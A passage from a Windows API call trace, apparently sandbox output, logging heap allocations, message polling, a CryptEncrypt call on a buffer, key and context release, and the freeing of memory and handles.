(HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.367] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0075.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.367] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4188*, pdwDataLen=0x61e2d8*=0x1040, dwBufLen=0x1050 | out: pbData=0x6a4188*, pdwDataLen=0x61e2d8*=0x1050) returned 1 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.368] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0075.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.368] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.368] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.368] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.368] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.368] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.369] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.370] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.370] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.370] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.370] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.370] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0075.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.370] CryptDestroyKey (hKey=0x6b8af8) returned 1 [0075.370] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.370] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.370] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.371] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.371] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.371] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.371] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.371] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.371] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.371] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.371] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.371] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.371] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.371] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.372] CryptReleaseContext (hProv=0x696ad0, dwFlags=0x0) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.373] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.373] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.373] FreeLibrary (hLibModule=0x77710000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0075.373] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0075.373] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.373] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.373] CloseHandle (hObject=0x140) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0075.374] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.374] CloseHandle (hObject=0x128) returned 1 [0075.375] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.375] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.375] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0075.376] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a82f8 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 